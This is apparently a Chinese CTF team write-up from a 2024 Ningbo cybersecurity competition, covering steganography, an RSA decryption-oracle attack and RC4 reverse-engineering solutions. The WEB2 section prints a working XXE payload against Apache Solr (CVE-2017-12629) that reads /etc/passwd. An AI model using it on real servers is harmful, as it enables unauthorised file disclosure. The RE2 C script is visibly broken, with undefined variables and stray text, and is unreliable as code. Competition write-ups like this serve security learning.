2024“天一永安杯“宁波第七届网络安全大赛极安云科战队部分WP-阿里云开发者社区

2024“天一永安杯“宁波第七届网络安全大赛极安云科战队部分WP

2024-05-06 177

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 2024“天一永安杯“宁波第七届网络安全大赛极安云科战队部分WP

“天一永安杯”2024 宁波第七届网络安全大赛暨第九届大学生网络技术与信息安全大赛

大赛竞赛形式

一、线上初赛

参赛人员：各单位自行选拔3人（设队长1名）组成团队，不足3人不允许参赛。

竞赛时间：8：30-12：00（比赛3个小时，不含签到时间）

竞赛模式：CTF解题模式

（排名图为赛时截的，最终排名应该是50多，行业组排30多）

Geek极安云科战队WriteUp

解题情况：Web1、Web2、RE1、RE2、CY1、MISC1

MISC1

7通道LSB隐写

WEB1

BP直接抓到

WEB2

XML注入：Apache solr XML 实体注入（CVE-2017-12629）

payload：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">

    <!ENTITY % expr 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>

CY1

import websocket
import json
from Crypto.Util.number import *
from gmpy2 import *

def get_flag(ws):
    x = ""
    ws.send(json.dumps({"cmd": "get_flag"}))
    while x == "" or x == "Pls send msgs and I'll return the result":
        x = ws.recv()
    return x

def f(ws, cmd, data):
    x = ""
    ws.send(json.dumps({"cmd": cmd, "data": data.zfill(512)}))
    while x == "" or x == "Pls send msgs and I'll return the result":
        x = ws.recv()
    return x

uri = "ws://xxx.xxx.xxx.xxx:xxxxx"
ws = websocket.create_connection(uri)
c = int(get_flag(ws), 16)
c2 = int(f(ws, "enc", hex(2)[2:]), 16)
c3 = int(f(ws, "enc", hex(3)[2:]), 16)
c4 = int(f(ws, "enc", hex(4)[2:]), 16)
c9 = int(f(ws, "enc", hex(9)[2:]), 16)
n = GCD(c2**2 - c4, c3**2 - c9)
enc_flag_2 = c2 * c % n
flag_2 = int(f(ws, "dec", hex(enc_flag_2)[2:]), 16)
print(long_to_bytes(flag_2 // 2))

RE1

key和key1用crypto1算法混淆，再用cry2算法吧加密后的key混淆

def init(s, key1):
    key_length = len(key1)
    for i in range(256):
        s[i] = i
    j = 0
    for i in range(256):
        j = (j + s[i] + key1[i % key_length]) % 256
        s[i], s[j] = s[j], s[i]

def crypt1(s, key):
    v5 = 0
    v6 = 0
    encrypted_key = bytearray(key)
    for i in range(len(key)):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        s[v5], s[v6] = s[v6], s[v5]
        key_stream_byte = s[(s[v5] + s[v6]) % 256]
        encrypted_key[i] ^= key_stream_byte
    return encrypted_key

def before_main(key, key1):
    s = list(range(256))
    init(s, key1)
    encrypted_key = crypt1(s, key)
    return encrypted_key
key1 = b"keykey" 
key = b"ban_debug!" 
encrypted_key = before_main(key, key1)

print("Encrypted key:", encrypted_key)

def init(s, key):
    key_length = len(key)
    for i in range(256):
        s[i] = i
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % key_length]) % 256
        s[i], s[j] = s[j], s[i]

def crypt2(s, data):
    v5 = 0
    v6 = 0
    encrypted_data = bytearray(data)
    for i in range(len(data)):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        s[v5], s[v6] = s[v6], s[v5]
        key_stream_byte = s[(s[v5] + s[v6]) % 256]
        encrypted_data[i] = (encrypted_data[i] - key_stream_byte) % 256
    return encrypted_data

def decrypt2(s, cipher):
    decrypted_data = bytearray(cipher)
    v5 = 0
    v6 = 0
    for i in range(len(cipher)):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        s[v5], s[v6] = s[v6], s[v5]
        key_stream_byte = s[(s[v5] + s[v6]) % 256]
        decrypted_data[i] = (decrypted_data[i] + key_stream_byte) % 256
    return decrypted_data
key = b'key'
cipher = bytes([0x4e, 0x47, 0x38, 0x47, 0x62, 0x0a,  0x79, 0x6a, 0x03, 0x66, 0xc0, 0x69, 0x8d, 0x1c, 0x84, 0x0f, 0x54, 0x4a, 0x3b, 0x08, 0xe3, 0x30, 0x4f, 0xb9, 0x6c, 0xab, 0x36, 0x24, 0x52, 0x81, 0xcf])
s = list(range(256))
init(s, key)

decrypted_flag = decrypt2(s, cipher)
print("Decrypted flag:", decrypted_flag.decode())

第一个脚本得到加密flag的key，使用第二个脚本解出flag

RE2

修改UPX特征码后upx -d脱壳，IDA分析，rc4改了轮数

并且key在加密之前修改了

解密脚本

unsigned char sbox[size] = {0};
void init_sbox(unsigned char *key)
{
unsigned int i, j, k;
int tmp;
for (i = 0; i < size; i++)
{
sbox[i] = i;
}
j = k = 0;
for (i = 0; i < size; i++)
{
tmp = sbox[i];
j = (j + tmp + key[k]) % size;
sbox[i] = sbox[j];
sbox[j] = tmp;
if (++k >= strlen((char *)key))
k = 0;
}
}
void encode(unsigned char *key, unsigned char *data)
{
int i, j, k, R, tmp;
init_sbox(key);
j = k = 0;
for (i = 0; i < strlen((char *)data); i++)
{
j = (j + 1) % size;
k = (k + sbox[j]) % size;
tmp = sbox[j];
sbox[j] = sbox[k];
sbox[k] = tmp;
R = sbox[(sbox[j] + sbox[k]) % size];
data[i] ^= R;
}
}
int main()
{
unsigned char a[] = {42, 35, 69, 104, 85, 10, 60, 34, 61, 57, 35, 119, 114, 50, 1
24, 92, 117, 65, 27, 87, 123, 112, 19, 79, 5, 51, 28, 0};
unsigned char key[20] = "Th1s_1s_Re@lly_k3y";
encode(key, buffer);
printf("%s", a);
3 / 4
return 0;
}

2024“天一永安杯“宁波第七届网络安全大赛极安云科战队部分WP

MISC1

WEB1

WEB2

CY1

RE1

RE2

热门文章

最新文章

相关课程

相关电子书

相关实验场景

热门

活动广场

任务中心

开发者评测

高校计划

乘风者计划

训练营

阿里云MVP

话题

直播

下载

镜像站

技术资料

插件

2024“天一永安杯“宁波第七届网络安全大赛极安云科战队部分WP

MISC1

WEB1

WEB2

CY1

RE1

RE2

热门文章

最新文章

相关课程

相关电子书

相关实验场景